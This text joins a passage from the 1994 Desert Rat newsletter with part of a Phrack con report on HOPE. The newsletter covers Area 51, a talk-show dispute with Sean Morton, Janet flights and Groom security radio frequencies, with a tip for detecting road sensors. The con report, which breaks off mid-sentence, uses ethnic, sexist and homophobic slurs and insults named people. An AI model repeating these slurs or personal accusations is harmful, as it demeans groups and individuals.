RUSS ESTES: "Montel, my biggest problem, and this is what I've
run into over and over again, is the quality of the individual who
is bringing me the message. You know, the-boy-that-cried-wolf
syndrome is phenomenal in this field. You get people out there
who are saying, I'm this, I'm that, and I hate to do this to you,
Sean, but here's a guy right here who claims to be the Doctor,
Reverend Sean David Morton. In his own biography, he claims to
have gotten his Doctor of Divinity at--excuse me, it will take me
one second...."
SEAN MORTON: "Berachah University."
RUSS ESTES: "Berachah University, Houston, Texas--the Berachah
Church. I called them. They don't have any type of degrees that
they give. They have Bible study at the best. He claims to have
attended University of Southern California...."
MONTEL WILLIAMS: "So the point that you are making, Russ, is that
there's a problem with the messenger, so therefore the message is
not real."
RUSS ESTES: "How can you believe the message if the people lie to
you from the start."
SEAN MORTON: "The thing I'd like to point out about Mr. Estes
here is that if you don't like the message, you can shoot the
messenger, and it's obvious to me that in the UFO field, we do
this for free, we do this because we want to know the truth,
because we have seen something...."
RUSS ESTES: "But does that mean you bogey up your credentials?"
SEAN MORTON (angry): "That is not true. You are flat-out lying
to these people. I went to USC for four years."
Just then, the debate was cut off by a sloppy edit, and Sean's USC
diploma appeared on the screen.
After watching the tape, we contacted Russ Estes. He said that
the debate between he and Sean went on much longer than was shown
on the screen. "Live on tape" does not mean totally unedited.
This show went on for over two hours to obtain a one hour's worth
of material. Sometimes, whole shows are thrown out when they
don't work. Unfortunately, Estes made a misstep on the USC
degree. As it turns out, this is just about the only authentic
credential he has: a B.A. in Drama and Political Science. We
certainly believe the Drama part: It's the last degree he ever
needed.
The Doctor of Divinity degree is still phony, but in the talk show
world, evidence counts for nothing; only emotions and presentation
matter. Sean walked away from the show as a brave and
knowledgeable crusader, legitimized by a promise from Montel to
take his tour, and with the implied invitation to reappear on the
show. Estes walked away alone, wasn't invited to return, and has
since had to live down the "Does Not Believe in UFOs" moniker.
Sean even had the delightful gall to send Estes a letter, through
the producers...
---
Mr. Russ Estes
c/o Alex Williams [sic]
The Montel Williams Show
1500 Broadway Suite 700
New York, New York, 10036
Dear Russ:
I am going to assume that you are not a bold faced liar who is out
for some kind of warped revenge, or a person who is just trying to
make a buck off baseless slander.
Let's try to solve this like gentlemen - enclosed is a copy of my
U.S.C. diploma. I have also called the school and my records are
intact. The rest of your "research" on me is equally faulty.
I hope this solves out problem. If not, I have consulted my
attorney and any further slander directed toward me through your
video series or elsewhere, will result in action taken against
you.
Yours Truly,
[BIG signature]
Sean Morton
---
Things were beginning to look grim for Psychospy. With the time
of the taping drawing near, we hadn't even begun to scratch the
surface of Sean David Morton and his path of destruction. Talking
to our contacts, we saw that Sean had accumulated a vast audience
of intimate enemies, more than we could possibly contact. If Sean
sounds knowledgeable and occasionally has some meaningful
information, it is because he has ripped it off from others. We
were amused to find that there was even an reputable astrologer
who hated Sean, who felt that Sean had stolen his predictions and
passed them off as his own.
It seemed a futile exercise anyway. We knew all the evidence in
the world wasn't going to matter when we actually faced off
against Sean on camera. We were leaving behind our own
comfortable medium of logic and data and stepping into his home
turf--the talk show--where presentation counts more than content.
We were obligated by our own ethics to speak only the simplest
truths and the cautious assertions supported by data. Sean David
Morton, bold faced liar that he is, faced no such constraints. He
could spout any lie he wanted to sound important and get himself
off the hook, and the only thing that mattered here was that he
said it with apparent sincerity and that it held up for
television's thirty second attention span. We knew that if we
started to make an accusation about him, he would instantly sense
the winds and make the same one against us with greater force.
The ensuing argument would make he and us appear to be equals.
Sean knew all the buzzwords and cliches of the UFO movement and
could spout the conventional wisdom much faster than we could. He
knew how to sound sincere and reasonable and adapt instantly to
the sentiments of any social circumstance. He was well-practiced
at responding to inquisitions and had emerged from many without a
scratch. Opposing him, all we had was a body of mundane knowledge
about a very limited area of the desert. Sean was smooth and
well-honed in his talk show delivery, and we were stumbling in for
the first time to a medium where we really didn't want to be.
It was with these reservations and a sense of dark foreboding that
we packed our bags and headed for New York City. There, in Times
Square, we expected a titanic battle between Good and Evil, and
things didn't look good for Good.
[To be continued in Desert Rat #16....]
----- NEW AIR FORCE STATEMENT ON GROOM -----
The following statement was recently released to inquiring
journalists by the Nellis AFB public affairs office. (We
requested our own copy from Major George Sillia on Aug. 26.) It
represents a significant shift from the previous "We know nothing
about Groom Lake" response.
"There are a variety of facilities throughout the Nellis Range
Complex. We do have facilities within the complex near the dry
lake bed of Groom Lake. The facilities of the Nellis Range
Complex are used for testing and training technologies,
operations, and systems critical to the effectiveness of U.S.
military forces. Specific activities conducted at Nellis cannot
be discussed any further than that."
That's a step in the right direction. What the base needs now is
a name and a history. For example, tell us about the U-2 and A-12
programs at Groom in the 1950s and 1960s. That's not very secret
or critical to our current defense, so what's the point in
pretending it is? Will the Air Force take control of the
situation and provide this information itself, or will the void be
filled by a dozen aggressive entrepreneurs?
We'd bet our money on the entrepreneurs.
----- EG&G TO ABANDON TEST SITE ----
According to an 8/26 article in the Las Vegas Review-Journal, EG&G
and its REECo subsidiary will not seek renewal of their Nevada
Test Site contract when it expires in 1995. These are two of the
three companies that have managed the nuclear testing ground since
its inception. It is unclear whether this action will have any
affect on operations at the adjoining Groom Lake base, where EG&G
and REECo are also assumed to be major contractors.
Recent rumors say that EG&G no longer operates the "Janet" 737
jets that shuttle workers to Groom and Tonopah. That operation
has supposedly been taken over by the Air Force, using the same
aircraft and possibly the same staff.
----- JANET "N" NUMBERS -----
For aircraft watchers, here are the registration and serial
numbers of Janet 737s and Gulfstream commuter planes spotted at
the Janet terminal at McCarran airport. Based on observations in
5/94 and the 4/30/94 FAA registry. One or more of the Janet
aircraft are probably missing from this list. (We ask our readers
to find them.)
Boeing 737...
Reg. #/Serial #/Owner
N4508W 19605 Great Western Capital Corp, Beverly Hills
N4510W 19607 Great Western Capital Corp, Beverly Hills
N4515W 19612 Great Western Capital Corp, Beverly Hills
N4529W 20785 First Security Bank of Utah, Salt Lake City
N5175U 20689 Dept. of the Air Force, Clearfield UT
N5176Y 20692 Dept. of the Air Force, Clearfield UT
N5177C 20693 Dept. of the Air Force, Clearfield UT
Gulfstream C-12...
N20RA UB-42 Dept. of the Air Force, Clearfield UT
N654BA BL-54 Dept. of the Air Force, Clearfield UT
N661BA BL-61 Dept. of the Air Force, Clearfield UT
N662BA BL-62 Dept. of the Air Force, Clearfield UT
----- JANET HANDOFF FREQUENCIES ----
A DESERT RAT EXCLUSIVE! Published here for the first time are the
air traffic control frequencies for the "Janet" 737 crew flights
from Las Vegas McCarran Airport to Groom. The McCarran freqs are
public, but the Groom ones have not been revealed until now. Air
traffic control broadcasts are "in the clear" and any scanner
radio should be able to pick them up. Each of these freqs has
been personally confirmed by Psychospy or a close associate.
121.9 McCarran Ground Control
119.9 McCarran Tower
133.95 Departure Control
119.35 Nellis Control
120.35 Groom Approach
127.65 Groom Tower
118.45 Groom Ground
Here are some other Groom freqs (some of which were previously
reported in DR #8). The security frequencies are usually
scrambled, but not always.
418.05 Cammo Dudes (primary)
408.4 Cammo Dudes (repeat of 418.05)
142.2 Cammo Dudes
170.5 Cammo Dudes (Channel 3)
138.3 "Adjustment Net" (seems related to security)
261.1 Dreamland Control (published)
255.5 Groom Tower (repeat of 127.65)
154.86 Lincoln County Sheriff
496.25 Road sensors on public land
410.8 Pager (apparently from Groom but unconfirmed)
The most accurate way to detect a road sensor (AFTER you have
tripped it), is to program 496.25 into several channels of your
scanner, then scan those channels exclusively as you are driving.
When the scanner stops on one channel, you have just passed a
sensor.
----- GROOMSTOCK '94 -----
The "Freedom Ridge Free Speech Encampment" went pretty much as
planned, with at least sixty people in attendance but not all of
them staying for the night. There were no surprises and, sadly,
no confrontations with the authorities when we whipped out our
cameras and pseudo-cameras to point at the secret base. The Cammo
Dudes were visible but kept their distance, and the only authority
figure to show up on the ridge was a BLM Ranger in a Smoky-the-
Bear hat. He was concerned only that we clean up our trash, and
he warned us, by his very presence, that "Only You Can Prevent
Forest Fires."
The event was recorded in an 8/29 article in the Las Vegas Review-
Journal, which dubbed it "Groomstock." [The article may be
available at the FTP site.] We were disturbed to read in the
paper that the attendees included some "marijuana-smoking
slackers." We called around and found out it was true and that it
happened after Psychospy went to bed. Had we known, we would have
quashed it immediately. This sort of thing discredits our ability
to police ourselves and hurts the reputation of the land grab
opponents.
The hot gossip around the campfire was about the Review-Journal
reporter and the loony in the tie-dyed shirt. The loony had spent
about an hour moving rocks and dirt around to make himself a
comfortable bed, then he blew a conk-shell horn and banged cymbals
together to bless it. When the reporter arrived, he volunteered
to make a bed for her, too, not far from his own, and he proceeded
with the project without any encouragement. It is unknown why he
singled her out for this special honor, but evidently she was
"chosen." It should be noted, however, that while blessing the
reporter's bed, the loony accidentally dropped one of the cymbals.
We forget to check with the reporter in the morning to see if that
omen affected the quality of her nighttime experience.
----- SOUND FAMILIAR? -----
From an AP news story printed in the 8/5 Review-Journal...
"PORT-AU-PRINCE, Haiti -- Authorities deported an American TV
crew Thursday, putting the three journalists in an open pickup
truck, parading them through the capital and then dumping them at
the Dominican border....
"Soldiers detained the freelance journalists for PBS's 'The
MacNeil/Lehrer Newshour' on Sunday while they were filming at
Port-au-Prince's airport. Three of their videotapes were
seized....
"The military-backed government has urged journalists not to
report 'alarmist' news and has attempted to restrict news
coverage....
"'I think it's deplorable, and it's obviously an attempt to
embarrass them,' [U.S.] Embassy spokesman Stanley Schrager told
The Associated Press. 'This treatment was not necessary; neither
was the deportation.... It's a transparent attempt by this
illegal regime to interfere with the free flow of information.'"
In related news, the four of the five video tapes seized on July
19 from KNBC-TV have still not been returned. The tapes were
taken without a warrant after the crew filmed an interview on
Freedom Ridge but not the Groom base itself. Activist Glenn
Campbell, who accompanied the crew, was arrested when he attempted
to interfere with this seizure.
----- CAMPBELL ARRAIGNED -----
Activist Glenn Campbell reports that his Aug. 24 arraignment on
obstruction charges was "amicable." Charges were presented, but
the District Attorney did not appear. The complete text of the
charges, stemming from the July 19 KNBC incident, reads as
follows...
---
Case No. P55-94
IN THE JUSTICE COURT OF THE PAHRANAGAT VALLEY TOWNSHIP
IN AND FOR THE COUNTY OF LINCOLN, STATE OF NEVADA
CRIMINAL COMPLAINT
STATE OF NEVADA, Plaintiff,
vs.
GLENN P. CAMPBELL, Defendant.
STATE OF NEVADA ) ss.
County of Lincoln )
DOUG LAMOREAUX, being first duly sworn and under penalty of
perjury, personally appeared before me and complained that on or
about the 19th of July, 1994, in Lincoln County, State of Nevada,
the above-named Defendant, GLENN P. CAMPBELL, committed the
following crime:
COUNT 1
OBSTRUCTING PUBLIC OFFICER, a violation of NRS 197.1990 and LCC
1.12.010, a MISDEMEANOR, in the following manner:
The Defendant did, then and there, after due notice, willfully,
hinder, delay or obstruct a public officer in the discharge of his
officer powers or duties. Specifically, the Defendant did, then
and there, after due notice, willfully hinder Sergeant Doug
Lamoreaux in the discharge of his official duties by locking the
doors of the vehicle which Sergeant Lamoreaux was retrieving
certain items from and further refused to unlock the doors after
being requested to do so by Sergeant Lamoreaux.
All of which is contrary to the form of Statute in such cases made
and provided and against the peace and dignity of the State of
Nevada. The complainant, therefore, prays that a Warrant be
issued for the arrest of the Defendant, if not already arrested,
so that he may be dealt with according to law.
[Signed]
DOUG LAMOREAUX
Sergeant
Lincoln County Sheriff's Department
SUBSCRIBED and SWORN to before me
this 24th day of August, 1994
[Signed] NOLA HOLTON
NOTARY PUBLIC/JUSTICE OF THE PEACE
---
The only surprise in these charges is the line "and further
refused to unlock the doors after being requested to do so by
Sergeant Lamoreaux." That is not how Campbell recalls the
incident. DR#12, published less than 12 hours after the incident,
reported it as follows...
"At this point Campbell, who had been standing on the opposite
side of the vehicle, reached in and pushed down the door locks on
the side that Lamoreaux was approaching.
"Lamoreaux said, 'You're under arrest.' Campbell was
immediately handcuffed and placed in Deputy Bryant's vehicle."
Campbell claims that Lamoreaux said, "You're under arrest,"
IMMEDIATELY after he pushed down the door locks, with no request
being made to unlock them. Campbell says he has two other
witnesses, the KNBC crew, who can verify his story. In this case,
where the basic recollection of facts is in conflict, it will be
interesting to see what the second officer, Deputy Kelly Bryant,
will say under oath.
However, the core of Campbell's defense rests on Constitutional
issues. He is guilty of obstruction only if the officer was
indeed engaged in the "lawful" execution of his duties. Lamoreaux
justified his warrantless search by citing, in vague terms, a
certain Supreme Court ruling, the name of which he could not
recall at the time. That ruling is apparently in the case "Ross
vs. U.S." which allows the warrantless seizure of "contraband"
from a vehicle when there is a danger of flight. It is unclear at
this point whether the video tapes of a news crew constitute
contraband in the same manner as a shipment of marijuana or stolen
merchandise. Complex First Amendment issues may be invoked. The
case may be further complicated by the repeated offer by the TV
reporter to allow Lamoreaux to view the video tapes himself.
Campbell has requested, and has been granted, a jury trial.
According to the Justice, this will be the first jury trial held
in this court since about 1987. Campbell announced his intention
to represent himself at the trial, with possible legal co-council.
A tentative trial date of Oct. 25 has been set, but it is likely
to be postponed. Campbell indicated that he will waive his right
to a trial within 60 days to allow more time to conduct legal
research.
----- LARRY KING NOT CLONED? -----
Our report in DR#13 about the diversion of Larry King's plane to
Nellis AFB continues to disturb many of our readers. It raises
the specter of secret contacts between King and the military or
even a surreptitious replacement of the talk show host by a look-
alike clone. Now, we wonder if our panic was only a false alarm.
A producer from a Las Vegas TV station tells us: "I checked into
it and think it is legit. According to the FAA, McCarran Airport
was never really closed, but they did have pilots choose not to
land on that Saturday afternoon because of inclement weather.
They also confirm that there is an agreement with Nellis to allow
planes in trouble to land there. I spoke to the control tower at
McCarran. They checked their records, and they indicate that on
that Saturday a nasty thunderstorm was noted by the tower at 1:45-
2:05. In fact, four takeoffs were delayed during that time due to
weather. Planes in the air just flew holding patterns until the
weather cleared."
Presumably, King's plane didn't have enough fuel to maintain the
holding pattern. Thunderstorms can be very localized, and perhaps
Nellis was clear. A producer at Larry King Live says that, in her
opinion, he is definitely the same Larry King. She says he got
the military escort because he was late for a speaking engagement
and made his wants known on the plane.
So what can we say? Obviously, the FAA, the TV station and the
King producer ARE PARTIES TO THE CONSPIRACY. This story is deeper
than it seems, and the Rat will pursue the investigation for as
long as it takes. THE TRUTH IS OUT THERE.
----- MYSTERIOUS SIGN DISAPPEARANCE -----
The big "No Photography" signs on the Groom Lake Road have
disappeared. For over a year, they were installed on public land
about two miles from the military border, but sometime in the
first week of August they were cleanly removed, posts and all,
apparently by the Air Force. (A civilian thief--like SDM, who has
a number of these signs in his possession--would have simply
unscrewed the signs, not uprooted the heavy posts and carefully
filled up the holes.) The two signs on either side of the road
were each about 3 feet by 4 feet and bore the following text:
WARNING: THERE IS A RESTRICTED MILITARY INSTALLATION TO THE WEST.
IT IS UNLAWFUL TO MAKE ANY PHOTOGRAPH, FILM, MAP, SKETCH, PICTURE,
DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR EQUIPMENT AT OR
FLYING OVER THIS INSTALLATION. IT IS UNLAWFUL TO REPRODUCE,
PUBLISH, SELL, OR GIVE AWAY ANY PHOTOGRAPH, FILM, MAP, SKETCH,
PICTURE, DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR
EQUIPMENT AT OR FLYING OVER THIS INSTALLATION. VIOLATION OF
EITHER OFFENSE IS PUNISHABLE WITH UP TO A $1000 FINE AND/OR
IMPRISONMENT FOR UP TO ONE YEAR. 18 U.S. CODE SEC. 795/797 AND
EXECUTIVE ORDER 10104. FOR INFORMATION CONTACT:
USAF/DOE LIAISON OFFICE
PO BOX 98518
LAS VEGAS, NV 89193-8518
The signs first appeared in May 1993 shortly after WFAA-TV from
Dallas took video of the base from White Sides. (When challenged
by the Sheriff, they admitted photographing the base but managed
to retain their tape.) The signs were removed in Aug. 1994
shortly after KNBC-TV from Los Angeles lost their video tape after
NOT photographing the base. It is unclear why the AF removed the
signs. Perhaps they have become a little smarter and are adopting
a "don't ask, don't tell" policy toward photography (but we
wouldn't want to be the ones to test that theory). The signs
themselves had become a tourist attraction, and no visitor could
resist having their picture taken beside them.
At the same time the "No Photography" signs vanished, the
misplaced "Restricted Area" sign also went away. This is the
crossed out sign seen in the NYT article, where the "stupid
faggot" comment had later been written and then erased (DR#12,13).
God, we'll miss that sign! It was as illegal as hell--being on
public land--but an old friend to us nonetheless.
At least now we can assure the public: If you see a Restricted
Area sign, it's real and they mean it.
----- INTEL BITTIES -----
ENCOUNTERS TRANSCRIPT. Complete, unedited transcripts (not just
the sound bites) of the interviews in the 7/22 Encounters show
(DR#10) are available to Compuserve users. Type GO ENCOUNTERS,
and look under "Browse Libraries" and "Interview Transcripts."
Interviews include Rep. James Bilbray (file FREED2.105), Agent X
(FREED1.105) and Glenn Campbell (FREED3A.105, FREED3B.105). This
is a transcript for video editing, so every "Um" and "Ah" is
recorded.
NEW GUARD FACILITY. We send our congrats to the Dudes on their
newly constructed prefab building next to the guard house on Groom
Lake Road (about a half mile inside the border). Apparently, they
are expecting more business along this part of the border and need
a new substation. Interested taxpayers can view the new building
from the first hill on the hiking trail to F.R. ("Hawkeye Hill"),
a location that will continue to be public even if F.R. is taken.
UPCOMING TV SEGMENTS. UNSOLVED MYSTERIES will broadcast a show on
UFOs with a segment on Area 51 on Sunday, Sept. 18 at 8pm. The
broadcast will include a new interview with Bob Lazar. THE
CRUSADERS will broadcast a segment on UFOs, including a visit to
F.R., on Sept. 10 or 11 (date and time vary by city). Air date
for THE MONTEL WILLIAMS SHOW taped on Aug. 23 has not been
confirmed, but it could be the week of Sept. 12.
===== SUBSCRIPTION AND COPYRIGHT INFO =====
(c) Glenn Campbell, 1994. (psychospy@aol.com)
This newsletter is copyrighted and may not be reproduced without
permission. PERMISSION IS HEREBY GRANTED FOR THE FOLLOWING: For
one year following the date of publication, you may photocopy this
text or send or post this document electronically to anyone who
you think might be interested, provided you do it without charge.
You may only copy or send this document in unaltered form and in
its entirety, not as partial excerpts (except brief quotes for
review purposes). After one year, no further reproduction of this
document is allowed without permission.
Email subscriptions to this newsletter are available free of
charge. To subscribe (or unsubscribe), send a message to
psychospy@aol.com. Subscriptions are also available by regular
mail for $15 per 10 issues, postpaid to anywhere in the world.
A catalog that includes the "Area 51 Viewer's Guide", the Groom
Lake patch and hat and many related publications is available upon
request by email or regular mail.
Back issues are available on various bulletin boards and by
internet FTP to ftp.shell.portal.com, directory
/pub/trader/secrecy/psychospy. Also available by WWW to
http://alfred1.u.washington.edu:8080/~roland/rat/desert_rat_index.
html
Current circulation: 1440 copies sent directly to subscribers
(plus an unknown number of postings and redistributions).
The mail address for Psychospy, Glenn Campbell, Secrecy Oversight
Council, Area 51 Research Center, Groom Lake Desert Rat and
countless other ephemeral entities is:
HCR Box 38
Rachel, NV 89001 USA
###
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 22 of 28
****************************************************************************
HOPE
by
Erik Bloodaxe
I was a little apprehensive about going to HOPE. I'd been warned for months
that "If you go to HOPE, you are going home in a body bag," and "I am
going to kick your fucking ass at hope," and "If you go, you're gonna get
shot."
Needless to say I found this a bit unnerving. As big an ego as I may have,
it still does not repel hot lead projectiles. Add this to the fact that my
best friend of 10 years was murdered by some random idiot with a pistol in
fucking pissant, Bible-thumping Waco, TX a few months back. Waco. And the
shooter wasn't even a Davidian, just a drugged-out 16 year-old. If the
kids pack heat in Waco, I know they must come standard issue in New York.
But, hell, I've haven't missed a con in ages. Could I actually miss
a SummerCon? Especially the SummerCon commemorating the 10th
anniversary of 2600 Magazine? Could I?
Like an idiot, I make my reservations. Ice-9, who was stuck with a
leftover ticket on United, traded it in and we were both off to New York.
We arrived late Friday night. So there we were: The Big Apple, Metropolis,
The City that Never Sleeps. Unfortunately, it never showers or changes
its clothes either. Why anyone in their right mind would want to come
to New York City boggles the mind. It sucks. I mean, I've been damn
near everywhere in the United States, I've been to major cities in Mexico,
Canada and Europe, and New York is by far and away the worst fucking
shithole I've seen yet. I don't know for certain, but Port au Prince
probably has more redeeming qualities.
I figured out within a few minutes why New Yorkers are such assholes too.
First, no one seems to be from New York exactly, merely transplants from
somewhere else. So what has happened is that they bought into New York's
superb public relations campaign and sold off all their belongings to get
their ticket to America and the land of opportunities. So, they find
themselves in NYC with about half a billion other broke, disillusioned
immigrants wading in their own filth, growing very pissed off at being sold
such a bill of goods.
It would piss me off too. And I'm sure our cab driver that night missed his
family's ancestral thatched hut back in good old Bangladesh. But luckily for
him crack provides a good short-term solution. Not to mention excellent
motor skills.
Twenty-five near misses, and a lengthy carhorn symphony later, we managed to
arrive at the Hotel Pennsylvania intact. The hotel, heralded in legend and
lore had seen better decades. About the only thing it had going for it was
one of the oldest phone numbers in the city. PEnnsylvania 6-5000.
(Ta-da-dum-dum) I think if Glen Miller were alive today, his band members
would kick his ass if he told them they had to sleep there.
For a hundred dollars a night, Ice-9 and I were treated to two less than
jail-house sized beds, a tv that almost worked, and a hardwired telephone
(ie: no modular jacks in sight.) In addition, the entire room was stained
from floor to ceiling, and most of the wall paper by the window had peeled
halfway down. The window itself opened to a miraculous view of the trash
12 floors down. We debated on throwing every single object in the room
out the window for a little excitement, but decided it might injure some of
the homeless below.
Anxious to get the hell out of our little cell (well, the prisons I've had
the misfortune to sleep in were in better repair) Ice-9 and I took off to
the top floor and the HOPE conference area.
I don't know why Emmanuel decided to call this conference "Hackers On Planet
Earth." This conference had more right to the title "Hacking at the End
of the Universe." Perhaps even "Hacking in the Cesspool of the Earth."
HEU was in the middle of nowhere, but it was pretty and happy. It should have
been called HOPE.
In fact, as the days went on, I noticed a number of similarities between
HOPE and HEU:
1. Both heavily orchestrated by 2600 and Hack-Tic
2. Both had in-house networks
3. Both had token "fed" speakers
4. Both had seminars on boxing, pagers, social engineering, history,
UNIX, cellular, magnetic cards, lock picking, legal issues, etc.
5. Both drew extensive press attendees
6. Both charged more than any other conferences. (HOPE 25, HEU 50)
7. Both had over a thousand attendees
8. Both used computer equipment to make photo badges
9. Both tried far too hard to be technical
10. New York used to be New Amsterdam
But I digress...
Anyway, the network room was beginning to shape up quite nicely. Young
hacklets were already clicking away at their keyboards, oblivious to
anything else save their screens. Why anyone would travel all the way to
New York to sit in front of a screen and type all by their lonesome
left me stymied. Isn't that what we all do back at home?
The first people we ran into were Winn Schwartau and Bootleg. I could
be wrong, but I think a large factor in Winn's showing up at HOPE was
to watch me get shot and write about it. He told me his article would
be titled, "Cyber-Christ gets nailed to the Cross." Bootleg, however, was
here to raise a little hell. And goddamnit, so were we!
Hacker conferences have always been an excuse for people who only knew
each other over the phone and over the networks to actually meet face to
face and hang out. Anyone who tells you "Conferences today suck, there isn't
enough technical inpho," is a clueless fuck. You do not go to a conference
expecting to learn anything. If you don't already know, chances are pretty
damn good that the people who do won't tell you. You learn by doing, not by
sitting in an audience at some hacker con. Get a beer, make some new friends,
and THEN maybe you might pick up something in casual conversation, but at
least you will have a good time getting sloshed with new people who share
common interests. The only people who will learn something from
hacker conferences are journalists who will then go on to write even
more scathing sensationalist pieces about how hackers will destroy
your credit and eavesdrop on your phone. Is that what we really
want?
Me, Ice-9, Bootleg, Bootleg's friend from Oregon, and Thomas Icom took off
to drink and see what debauchery lay waiting for us in Times Square.
(Yes, it was a very, very, very mismatched looking group.) Icom, armed
with ever-present handheld scanner, kept a continual broadcast of NYPD's
latest exploits.
We ended up hanging out on the fringes of Times Square at some sidewalk
deli bullshitting about anything and everything. A recurring topic throughout
the whole weekend was EMP and HERF weaponry. I don't particularly know
if anyone in the underground would more excited by setting off one of these
devices, or merely being able to brag to everyone that they were in possession
of one.
We sat talking about the ramifications of setting off some such device on
the roof of the building we were sitting in front of. The thought of
all the neon and electronics surrounding us simultaneously ceasing to
function and imploding at the logic gate level provided for at least an
hour of hacker masturbation material. Bootleg reminisced about trying to
track down decommissioned military radar equipment back in the early 80's
for just such a project. "I'm surprised it's taken this long for the
underground to get up on this stuff," he said.
As we headed back to the hotel, we passed by the coolest vehicle ever
seen by hacker eyes. The 2600 van was an exact replica of a NYNEX
van, with the subtle addition of the magazines moniker instead of
NYNEX, and a ball-capped hack-type tapping away on a notebook computer,
plugged into the bell logo. It was truly a sight to behold. I began
to drool. All Phrack has is a beat up, red Toyota Corolla.
Up in the network room those that were not deeply engrossed in hacking
the hope.net linux box were either already plowed (Hi Torquie!) or about
to be.
It was late, so we decided to crash.
Ice-9 and I managed to wake up at a reasonable hour, and took off to
see the city. I had seen an electronics store the night before, and
had been looking for a PAL-NTSC-SECAM VCR for ages. I found it.
New York's only saving grace (well, except the huge amount of
businesses there all screaming for security work) was cheap consumer
electronics. For 380 bucks I got a VCR that not only converted on the
fly between any tape format, but also had a digital freeze frame
for those elusive screen captures. I was stoked.
After some food, we headed back up to the conference. The buzz was
someone had several hundred cell phones confiscated by Cellular One
reps after he off-handedly remarked that he would clone them
to a potential buyer. I then ran into two of my friends from WAY back
in the early 80's: Tuc and Agrajag. Ag is an amazing guy. Not only
was he fantastic way back then, he went on to write UNIX for Commodore,
pull stints at places like USL, and is now working with speech
recognition and wireless networking. Yet another fine example of
those ne'er-do-well Legion of Doom guys the government always
frowned upon. Right.
Later that afternoon, as I'm talking to someone in the network room, I feel
someone bump into me. "Oh, sorry," says the person, and I go on with my
conversation. A few seconds later, it happens again. Same guy, same
"Oh, sorry." When it happens a third time I shove the guy back, and
say, "Man, what the hell is your problem." Mistake. I look up straight
into the eyes of a guy about 7 feet tall and 2 feet wide. Well, I'm
exaggerating but it sure seemed that way at the time. All of a sudden
I am an extra in the Puerto Rican version of "Of Mice and Men."
"De Ratones Y Hombres"
The first guy was about 5 feet tall, and scurried around within an arms
reach of the big guy. Immediately I realize that if I do ANYTHING, this
big dude is more than ready to fuck me up, so the little guy must be a
diversion. The big guy grunts and begins to maneuver around me.
The little guy then takes his cue and begins pushing me, all the while
asking "What's your name? What's your handle?" I keep backing up keeping
an eye on the big guy, who is staring daggers at me. Well, at least with
his one good eye. His lazy eye, stared daggers at the wall, the carpet,
and a few other places.
Meanwhile, this little event has gathered the interest of many in the con.
People began to gather around to see Erik Bloodaxe finally get beat down.
Unfortunately for the would-be spectators, several others tried to intervene.
Tuc and a few of the other larger attendees went up to the big guy and
attempted to hold him back. This only succeeded in him letting out a
roar-like sound as he shrugged them off and continued coming towards me.
Finally, I say to the little guy, who has been engaging me in what was
basically the equivalent of the mosh pit at a Barry Manilow concert,
(One fucked up guy running into people who don't want to play his game)
"I'm Chris Goggans, who the hell are you?" To which he yells, "I'M JULIO!"
Julio, aka Outlaw, aka Broken Leg, was one of the MOD members who was
raided by the FBI and Secret Service some years back. While all
his MOD brethren served jail time, Julio worked out a deal with the
prosecutors in which he sold out his friends by agreeing to provide
state's evidence against them should the cases go to court.
And I'm the bad guy?
Fuck, all I ever did was try to keep my business running free of
interruptions from disgruntled, jealous teenagers. I never turned state's
evidence against my best friends to save my own ass. What am I, Agent Steal?
At this point everyone rushed in-between us and whisked Julio and his
lazy-eyed, neandrethal boyfriend out the door. (Notice, I can call him
all kinds of names now, because I'm back home in Austin, several thousand
miles away.) I still have no idea who the big guy was.
From now on, those of you who sincerely want to kick my ass, have the
nerve to do it by yourself. I mean, I only went as far up as green in
Tae Kwan Do, but that was far enough to learn the sacred truth, "Never
take on more than ONE person or you will get the shit kicked out of you."
Leave your boyfriends at home and be a man. If I have the balls to
go thousands of miles away from home an enter the DMZ expecting to get
shot, then you should have the balls enough to do something on your own.
And remember: take the first swing.
Shortly after "the incident" as it came to be called, by everyone who
approached me about it afterward, me, Winn, Dave Banisar, and Robert Steele
took off to find food. Steele decided we needed female accompaniment,
so he invited a reporter from Details. She brought along her camera crew,
who had been taking so many pictures around the con, one would think
they owned Polaroid stock.
Robert Steele is an interesting character. After a 20 year CIA tour he went
on to found Open Source Solutions, a beltway operation that uses public
sources of information to build intelligence dossiers. He described
himself as "a short, fat, balding old-guy." This is like Rush Limbaugh
calling himself "a harmless, loveable little fuzzball." Their self-image
is a bit removed from reality. Steele carries himself with the air of
a spy. It's kind of hard to explain, but it would be easy to see Steele
excusing himself from dinner, killing three guys in the alley, and coming
back for a piece of apple pie without an accelerated heartbeat or breaking
a sweat.
On top of being so immersed in the spy game, and having been in charge of
the design and implementation of the CIA's data center, Steele takes the
severely radical viewpoint that hackers are America's most valuable
resource, and should be put to productive use rather than jailed. This
man needs to come to more cons.
Dinner was odd to say the least. The media people sat together, somewhat
removed from us. They said approximately 5 words to us the whole time,
possibly feeling somewhat bored by our drunken computer revelry.
The reporter seemed visibly disturbed by all of us, and the guys
looked like they would be more comfortable sitting in a coffee shop
listening to Tom Waits while having a hearty debate over "Freud vs. Jung."
Our discussions got louder and louder as the scotch flowed, and
by the end of the evening most of the restaurant had heard such topics
as "The CIA does most of its recruitment in the Mormon church," and
"licking the floor at a Times Square peep show." By the time the check
came the Details people were more than happy to pay more than their share
of the bill to get the hell out of Dodge. A word of advice: always
get separate checks when dining out with any of us.
Back in the hood, everyone was milling about waiting for the
History of 2600 panel to begin. There was some kind of problem with
one of the displays, so people were beginning to grow restless. Right
about then one of the best looking girls at the con wandered by. Taking
a guess, I asked her, "Are you Morgen?" She was. It's almost unbelievable
that someone who would waste time hanging out on IRC and who can actually
interview for highly technical jobs could look like this.
Morgen, Earle, Mr. Fusion, Ixom and Garbage Heap were heading out to
get drunk, all of them rather disgusted by the regular con attendees.
They invited me, so I tracked down Ice-9, who by that time was so ready
for a pint of Guiness you could almost see the Harp Logo showing up
on his skin like drunken stigmata.
We ended up across the street at a little pub called the Blarney Rock.
Pitchers drained like sieves, kamikazes dropped like WWII and tequila shots
went down like Mexican whores. Everyone was in agreement that this
was the best time any of us had experienced at HOPE. In between everyone
drinking, and leering at Morgen, we actually talked about hacking stuff too.
Gee, and we weren't even on a panel!
As the night progressed, almost everyone from the con ended up at the Blarney
Rock. The con took the place over. The Blarney Rock probably made
more money that night than they had any night in recent history.
Everyone actually mingled, talked, planned and plotted. Plans were thrown
around for the next PumpCon (Boston?), everyone talked about "the time
they were busted the first time," Steele showed up wearing a Chinese
